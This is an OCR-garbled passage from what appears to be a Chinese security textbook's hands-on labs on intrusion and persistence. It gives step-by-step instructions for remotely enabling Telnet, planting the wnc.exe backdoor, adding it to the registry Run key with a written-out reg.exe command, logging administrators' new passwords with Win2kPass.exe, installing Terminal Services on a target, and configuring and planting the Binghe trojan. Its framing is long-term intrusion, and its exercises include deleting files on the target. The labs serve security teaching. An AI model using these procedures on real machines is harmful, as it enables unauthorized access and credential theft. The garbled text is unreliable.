执行 完成 后 ,对方 的 主机 的 Telnet nugis 了 。 在 DOS 提示 符 下 ,登录 对 方 主机 
的 Telnet 服务 ,首先 输入 命令 “Telnet 192. 168. 1. 2”, 因 为 Telnet 的 用 户 名 和 密码 是 明文 


四 x ux M- 


第 9 章 X 验 


Do 
e 


Remote Telnet Configure Script, by zzzevazzz 

Welcome to visite www.isgrey.com 

Usage: 

cscript C:\Documents and Settings Administrator W NRICS.vbe targetIP usernane 
password NILMAuthor telnetport 

It will auto change state of target telnet server. 


Conneting 192.168.1.2.... k 


Setting port-23.... 
T 
Querying state of telnet server.... 


Target telnet server has been START Successfully? 
Now, you can try: telnet 192.168.1.2 23, to get a 


C:\Documents and Settings WVidministrator A ED. 


A 9-154 开启 远程 Telnet 服务 


icrosoft (R) Windows 2808 《TM》 E 5.88 <A $E) 
迎 使 用 Microsoft Telnet Client 
elnet Client 内 部 版 本 号 5.99.99286 .1 


cape 字符 为 “CTRL+】 


将 要 发 送 密码 信息 到 Internet 区 域 中 的 远程 计算 机 。 这 可 能 不 安全 。 是 否 还 要 发 送 Cwm 


Yæ 


图 9-155 确认 发 送信 息 


输入 字符 
图 9-156 所 示 


录 界 面 , 此 时 需要 输入 对 方 主机 的 用 户 名 和 密 


y, 进 入 Telnet 的 码 ,如 


LM Authentication failed due to insufficient credentials. Please login with 


icrosoft (R) Windows (TM) Version 5.88 (Build 2195) 
elcome to Microsoft Telnet Service 


m 


9-156 登录 Telnet 的 用 户 名 和 密码 
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如 果 用 户 名 和 密码 没有 错误 ,将 进入 对 方 主机 的 命令 行 ,如 图 9-157 所 示 。 


A 9-157 登录 Telnet 服务 器 
这 是 后 门 ,利用 已 经 得 到 的 管理 员 和 密码 远程 开启 对 方 主机 的 Telnet 服务 
标 主机 的 长 久 人 侵 。 
思考 题 : 
1. NTLM—0,1,2 有 什么 不 同 , 为 什么 使 用 1 登录 ? 
2. 在 图 9-157 下 ,使 用 ipconfig 如 何 显示 当前 的 IP 地 址 ? 说 明 原 因 。 


实验 三 十 ”利用 工具 软件 wne 建立 Web 
服务 和 Telnet 服务 


1. 实验 目的 

使 用 工具 软件 wnc. exe 可 以 在 对 方 主机 上 开启 Web 服务 和 Telnet 服务 。 
服务 的 端口 是 808,Telnet 服务 的 端口 是 707 

2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 192. 168. 1. 1。 


,实现 对 目 


其 中 Web 


服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 1. 2。 


实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 
[ 具 软 件 : wnc. exe. 


3. 实验 步骤 


We 


服务 器 Windows 2000 
虚拟 机 下 。 


执行 过 程 很 简单 ,只 要 在 对 方 的 主机 上 执行 一 次 wnc. exe 即 可 ,如 图 9-158 所 示 。 执 行 
完毕 后 ,利用 命令 “netstat -an” 来 查看 开启 的 808 和 707 端口 ,如 图 9-159 所 示 。 图 9-159 所 


示 状 态 说 明 服 务 端 口 开 启 成 功 ,可 以 连接 该 目标 主机 提供 的 这 两 个 服务 。 首 先 测 


Microsoft Windows 20800 [Version 5.80.2195] 
«C» 版权 所 有 1985-1998 Microsoft Corp. 


IC: Documents and Settings \Adninistrator)cd\ 


IC: Yunc 


Ico 


iX Web 服 


图 9-158 ”运行 wne 建立 Web 服务 和 Telnet 服务 
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务 的 808 端口 ,前 提 是 目标 主机 是 Web 服务 器 ,在 本 机 浏览 器 地 址 栏 输入 “http:// 
192. 168. 1. 2:808”, 就 会 出 现 目标 主机 的 盘 符 列表 ,如 图 9-160 所 示 。 


选 定 C\WINNT\System32\emd.exe 


[C:\Documents and Settings\hdninistratorynetstat -an 
Active Connections 


Local Address Foreign Address State 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


LISTEN 
LISTEN 
LISTENING 
LISTENING 
LISTENING 


图 9-159 开启 的 端口 列表 


Jb ADSERVER — Microsoft Internet Explorer 


文件 中 dB FEV KRA IAV WR Y 
O se - x) i2 6 搜索 "ux C -B a- 
E http://192. 168. 1, 2:808/ “Bra 

= ADSERVER 
ex Fixed Bytes free: 3042M/4078M 
& CDROM 


Network Neighborhood 


ex @ Internet 


图 9-160 ”使 用 Web 服务 


可 以 下 载 对 方 硬盘 和 光盘 上 的 任意 文件 (对 于 中 文字 符 文件 名 的 文件 下 载 可 能 会 不 成 
功 ) ,可 以 到 WINNT\ Temp 目录 下 查看 对 方 密码 修改 记录 文件 ,如 图 9-161 所 示 。 

从 图 9-161 中 可 以 看 出 ,该 Web 服务 还 提供 文件 的 上 传 功能 ,可 以 上 传 本 地 文件 到 对 
方 服务 器 的 任意 目录 。 上 传 text. txt 文件 ,并 能 查看 上 传 的 文件 内 容 , 如 图 9-162 所 示 。 

可 以 利用 ”Telnet 192. 168. 1. 2 707”, 命 令 登录 到 目标 主机 的 命令 行 ,执行 方法 如 图 9-163 
所 示 。 

不 用 任何 的 用 户 名 和 密码 就 能 登录 到 目标 主机 的 命令 行 ,如 图 9-164 所 示 。 

通过 707 端口 也 可 以 获得 目标 主机 的 管理 员 权 限 。wnc. exe 不 能 自动 加 载 执行 ,需要 
将 该 文件 加 载 到 自 启 动 程序 列表 中 。 一 般 将 wnc. exe 文件 放 到 对 方 的 Windows 目录 或 者 
System32 目录 下 。 这 两 个 目录 是 系统 环境 目录 ,执行 这 两 个 目录 下 的 文件 不 需要 给 出 具体 
的 路 径 。 
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驰 czy - Hicrosoft Internet Explorer " 


xtq «Ap SEV O IRV Wb 
Qs - © iji pm ya O e 


Sixt Q7 48] http://192. 168. 1. 2:808/10RIVENC:/ -Era «us 


Directory: C:\ 


Date Time Size — Filename 
10-18-2002 20:50 DIR> (Documents and Settings! 
10-18-2002 DIR> OInetpub\ 

10-18-2002 «DIRÓ CjProgram Filesi 


03-15-2014 «DIR- 
10-18-2002 «DIE 
03-15-2014 261685 
01-10-2000 148992 
01-10-2000 162816 
10-18-2002 0 
10-18-2002 195 
01-10-2000 304624 
10-18-2002 0 
10-18-2002 0 
10-18-2002 0 
01-10-2000 34468 
01-10-2000 221012 
03-15-2014 201326592 


09-19-2002 10:52 54086 


202520530 Bytes, 13 Files, 5 Folders 


Tioad File: | C:\text. txt 


a D Internet 


9-161. 可 以 下 载 对 方 C 盘 的 文件 


F http://192. 168. 1. 2:808/%DRIVEXC:/text. txt 一 Microsoft Internet Explorer 


xét SAV 查看 QD RAO IAV Why 
Qa: O id Dr rm o 3 
HET) AE] http://192 168. 1.2:809/XDRIVEIC:/ text txt 


上 传 成 功 


9-162 ”上传 成 功 界 面 
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9-163 ”利用 Telnet 命令 登录 707 端口 


首先 将 wnc. exe 和 reg. exe 文件 复制 到 目标 主机 的 WINNT 目录 下 ,利用 reg. exe X 
件 将 wnc. exe 文件 加 载 到 注册 表 的 自 启动 项 目 中 。 在 DOS 根 目录 下 输入 命令 "reg. exe add 
HKLM\SOFTWARE \Microsoft\ Windows\CurrentVerson\Run / v service /d wnc. exe” ,执行 过 
程 如 图 9-165 所 示 。 
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a 
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dy 
ri 
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着 Telnet 192.168.1.2 E NH 


icrosoft Windows 28088 [Version 5.88.2195] 
KC》 版权 所 有 1985-1998 Microsoft Corp. 


:NDocuments and Settings\Adninistrator>ipconf ig 
ipconfig 


indows 2808 IP Configuration 

thernet adapter 本 地 连接 2: 
Connection-specific DNS Suffix 
IP Address. . 


Subnet Mask . . 
Default Gateway 


192.168.1.2 
255.255.255.8 


1NDocuments and Settings idministrator)? 


图 9-164 登录 到 对 方 的 主机 


E IEE C\WINNT\System32\cemd.exe E 


exe add HKLM\SOFIWARE\Microsort Windows \CurrentUersion\Run /v service /d 


4 


9-165 W wnc 到 自 启动 程序 
思考 题 : 
l. 使 用 wnc. exe 工具 软件 ,练习 文件 的 下 载 和 上 传 


2. 使 用 wnc. exe 工具 软件 ,telnet 到 对 方 机 器 ,删除 对 方 机 器 的 文件 


:十 一 ”记录 管理 员 口 令 修改 过 程 


1. 实验 目的 
利用 工具 软件 Win2KPass. exe 记录 管理 员 修 改 的 妆 
2. 实验 所 需 软 件 


服务 器 操作 系统 : Windows 2000/ Windows XP,IP 地 址 为 192. 168. 1. 2. 

客户 机 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168. 1. 3。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

[ 具 软 件 : Win2kPass. exe. 

3. 实验 步骤 

当 入 侵 到 对 方 主机 并 得 到 管理 员 口 令 以 后 ， ii 以 对 主机 进行 长 久 的 入 侵 。 但 是 好 的 
管理 员 一 般 每 隔 半 个 月 左右 就 会 修改 一 次 密码 


密码 ,这 样 已 经 得 到 的 密码 就 会 失效 。 利 用 工具 


软件 Win2kPass. exe 可 以 记录 管理 员 his 的 新 密码 ,该 软件 将 密码 记录 在 WINNTN Temp 
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目录 下 的 Config. ini 文件 中 ,有 时 文件 名 可 能 不 是 Config ,但 是 扩展 名 一 定 是 ini, 该 工具 软 
件 有 “自杀 ”功能 ,就 是 当 程 序 执行 完毕 后 ,会 自动 删除 。 

首先 在 对 方 的 操作 系统 中 执行 Win2kPass. exe 文件 , 当 对 方 管理 员 修 改 密码 并 重启 
后 ,就 会 在 WinntVTemp 目录 下 产生 一 个 ini 文件 ,如 图 9-166 所 示 。 


| HD MD HE) HRW IRD Woo 
GEB +- U| QNT LIR Qt GU Xon f 


z| era 


EERRTUEERRA. 


Bises. 
L5] 


ECCL 到 


IE àde-* deum ë 
9-166 ”密码 修改 记录 文件 


打开 该 文件 可 以 看 到 修改 后 的 新 密码 ,该 文件 只 有 当 密码 发 生变 化 时 才 会 产生 ,这 时 可 
以 看 到 新 的 密码 是 abcdef, 如 图 9-167 所 示 。 


KEAR 
2014-3-15 10:27:16 
当前 用 户 密码 : 


lUser-Rdministrator; Pass=abcdef; Domain-RDSERUER 


9-167 ”密码 记录 文件 的 内 容 


思考 题 : 利用 用 户 名 和 新 密码 和 对 方 机 器 建立 信任 连接 ,把 本 机 的 文件 复制 到 对 方 机 
器 ,或 把 对 方 机 器 的 文件 复制 到 本 机 。 


实验 三 十 二 ”Wep 方式 远程 桌面 连接 工具 


1. 实验 目的 

使 用 Web 方式 连接 远程 服务 器 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 172. 19. 25. 1, 
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服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 172. 19. 25. 10, 
实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚 El 国 
拟 机 下 安装 服务 器 Windows 2000 Advance Server /bpshor wsve mss 
Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 
机 下 。 mg 8 a e 
= wn2üDO.gK  defakhtm  msrdp.cab  winzoool.gf 
工具 软件 : 7 个 文件 如 图 9-168 所 示 。 
3. 实验 步骤 
将 这 些 文件 复制 到 本 地 IIS Web 站 点 的 默认 目录 (C:\inetpub\wwwroot) ,如 图 9-169 
所 示 ,注意 路 径 。 


mw sv [e 二 | 白 | 因 | 关 加 日 要 | 加 || 曙 | mA | i 


图 9-168 ”安装 需要 的 文件 


samples 
cVprogram les| common fies system lmsadc 
CIWIMITweblprinters. 


图 9-169 配置 Web 站 点 


然后 在 本 地 浏览 器 中 输入 “http://localhost” 打 开 连 接 程序 ,如 图 9-170 所 示 ,在 “服务 
器 "文本 框 中 输入 对 方 的 IP 地 址 ,再 选择 连接 窗口 的 分 辨 率 , 单 击 " 连 接 ” 按 钮 连接 到 对 方 的 
桌面 ,如 图 9-171 所 示 。 


J RR A i Web ifi - Microsoft Internet Explorer 

| X'MD MMO SEV ZRA IAD MWY 
em- +- Q2 AR uem nt D 2 wi- 

[itto [8 ep:/foc ahost z) e" wm 


Windows 
远程 桌面 Web 连接 


殷 入 要 使 用 的 运 得 计算 机 的 名 称 ， 选择 连接 
MRED, MESTIER. 


mennan, gausxsanmear, [Do] paos SS 
WIREI— ei EROS. 大 小 
g) 800 x 600 z) 
T XR IEREDAER URB u 


En. 


y 
DD Ei — 0; 


图 9-170 连接 到 终端 
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TFT 和 


BP: [anie i 
mo o [ee sl 


[ws ] m | so | 


您 已 登录 到 172. 19. 25.10 


3E; a: c — 7; 
图 9-171 登录 终端 服务 的 界面 
REB. 


1. 总 结 一 下 获得 用 户 名 和 密码 的 方法 有 几 种 ? 
2. 用 获得 的 用 户 名 和 密码 登录 到 对 方 机 器 的 桌面 。 


实验 三 十 三 ”使 用 工具 软件 djxyxs 开局 
对 方 的 终端 服务 


1. 实验 目的 

如 果 对 方 不 仅 没 有 开启 终端 服务 ,而且 没有 安装 终端 服务 所 需要 的 软件 ,使 用 工具 软件 
djxyxs. exe, 可 以 给 对 方 安装 并 开启 该 服务 。 

2. 实验 所 需 软件 

服务 器 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 192. 168. 1. 2。 

客户 机 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168. 1. 3, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : djxyxs. exe. 

3. 实验 步骤 

将 djxyxs. exe 文件 上 传 并 拷贝 到 对 方 服务 器 的 WINNNTNTemp 目录 下 (必须 放置 在 
该 目录 下 ,和 否则 安装 不 成 功 ) ,如 图 9-172 所 示 。 上 传 的 方法 很 多 ,可 以 利用 我 们 前 面 讲 过 的 
建立 信任 连接 等 。 
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BAE o BRARTI 
的 序列 号 是 B45F-6669 “ 


C: NWINNI NTenp 的 目录 


962-16-19 84:45 


438 Config.ini 
697.373 djxyxs.exe 


集 omiies 


9-172 上传 程序 到 WINNT Temp 下 


后 执行 djxyxs. exe 文件 ,该 文件 会 自动 进行 解压 并 将 文件 全 部 放置 到 当前 的 目录 
Ts kalpika iia 如 图 9-173 所 示 , 生 成 了 1386 的 目录 ,这 个 目录 
包含 了 安装 终端 服务 所 需要 的 文件 。 最 后 执行 解压 出 来 的 azzd. exe 文件 ,将 自动 在 对 方 的 
服务 器 上 安装 并 启动 终端 服务 ,然后 就 可 以 用 前 面 的 方法 连接 终端 服务 器 了 。 


:WINNT STenp?d jxyxs .exe 


Mrs n S sh 
FEN var 


C: WINNT\Tenp 的 目录 


438 Config.ini 
697,373 djxyxs -exe 
2,669 azzd.exe 

28,672 cq.exe 
62,952 sc.exe 
11,111 scuj.exe 


D T8 1359.00 9M á -5 


图 9-173 目录 列表 
思考 题 : 如 何 连接 到 终端 服务 器 上 ? 如 何 开启 对 方 的 终端 服务 ? 


实验 三 十 四 ”使 用 “冰河 ”木马 进行 远程 控制 


1. 实验 目的 

CD. 了 解 冰河 木马 程序 的 使 用 ,从 而 掌握 木马 病毒 的 工作 原理 。 

(2) 配置 木马 程序 的 服务 器 端 程序 。 

(3) 在 虚拟 机 上 种 植木 马 ,利用 本 机 对 虚拟 机 进行 监控 。 

2. 实验 所 需 软 件 

服务 器 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 192. 168. 1. 2。 
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客户 机 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 1. 3。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : win32. exe 文件 是 服务 器 端 程序 ,Y_Client. exe 文件 为 客户 端 程序 。 

3. 实验 步骤 

(1)“ 冰 河 ” 包 含 两 个 程序 文件 ,一 个 是 服务 器 端 , 另 一 个 是 客 、 ， 
户 端 。 文件 列表 如 图 9-174 所 示 。win32. exe 文件 是 服务 器 端 程 国 
JF. Y Client, exe 文件 为 客户 端 程序 。 将 win32. exe 文件 在 远程 计 m 


算 机 上 执行 以 后 ,通过 Y. Client. exe 文件 来 控制 远程 服务 器 ,客户 
端的 主 界面 如 图 9-175 所 示 。 


Y Client.exe 


图 9-174 文件 列表 


LILLHETII ini xi 


XE] de] 设置 [G] EH 


(y e x) RAE pom OM GR 


| smer: emn 7707 x] ma: — waue:i[ gm | 


9-175 ”客户 端 主 界面 


(2) 将 服务 器 程序 种 到 对 方 主机 之 前 需要 对 服务 器 程序 做 一 些 设置 ,比如 连接 端口 , 连 
接 密码 等 。 选 择 菜单 栏 "设置 "下 的 菜单 项 “配置 服务 器 程序 ”, 如 图 9-176 所 示 。 


EI —— = 车 
fy Be cas | Mp cu MGE C OR 
ETAT | 


INEEN |D esse | 
eo HL 
8 1l Localhost 


图 9-176 选择 服务 器 配置 程序 
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在 出 现 的 对 话 框 中 选择 服务 器 端 程序 win32. exe 进行 配置 ,并 填写 访问 服务 器 端 程序 
的 口令 ,这 里 设置 为 "1234567890”, 如 图 9-177 所 示 。 


icx 
T EFE |A 自我 保护 | y 邮件 通知 | 


9-177 配置 服务 器 


单 击 按钮 “确定 ”以 后 ,就 将 “冰河 ”的 服务 器 端 种 到 某 一 台 主 机 上 了 。 执 行 完 win32. 
exe 文 件 以 后 ,系统 没有 任何 反应 ,其 实 已 经 更 改 了 注册 表 , 并 将 服务 器 端 程序 和 文本 文件 
进行 了 关联 , 当 用 户 双 击 一 个 扩展 名 为 txt 的 文件 的 时 候 , 就 会 自动 执行 冰河 服务 器 端 程 
序 。 当 计算 机 感染 了 “冰河 ”以 后 ,查看 被 修改 后 的 注册 表 , 如 图 9-178 所 示 。 


ETITII] — ajoj xj 


8 C] tsuserex.nterfaces 

SHO tsuserex.interfaces. 1 

HO dle 

& C] tffle 

E T«CT». TransactonContext 
让 加 T«CTx.TransactonContextEx 


Lour qu 
[c Win Sys tense VSTSEXPLA EXE Xi 


9-78 查看 注册 表 


没有 中 冰河 的 情况 下 ,该 注册 表 项 应 该 是 使 用 notepad. exe 文件 来 打开 txt 文件 ,而 
图 9-178 中 的 “SYSEXPLR. EXE” 其 实 就 是 “冰河 ”的 服务 器 端 程序 。 

(3) 服务 器 中 了 “冰河 ”了 ,可 以 利用 客户 端 程序 来 连接 服务 器 端 程序 。 在 客户 端 添加 
服务 器 的 地 址 信息 ,这 里 的 密码 是 就 是 刚才 设置 的 密码 "1234567890”, 如 图 9-179 所 示 。 

单 击 按钮 “确定 ”以 后 ,就 可 以 查看 对 方 计算 机 的 基本 信息 了 ,对 方 计算 机 的 目录 列表 如 
图 9-180 所 示 。 

(4) 从 图 9-180 中 可 以 看 出 ,可 以 在 对 方 计算 机 上 进行 任意 的 操作 。 除 此 以 外 还 可 以 
查看 并 控制 对 方 的 屏幕 等 ,如 图 9-181 所 示 。 
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Aone 2000-1-10 12:00:00 
182816. 2000-1-10 12.00.00 
0 29-10-19 5.06.56 


图 9-180 查看 服务 器 的 目录 列表 


图 9-181 捕获 服务 器 的 屏幕 


思考 题 : 在 对 方 机 器 上 种 植 “冰河 "程序 ,并 设置 “冰河 ”的 服务 端口 是 %8999” 连 接 的 密 
码 是 0987654321 。 


L1] 
[2] 
[3] 
[4] 
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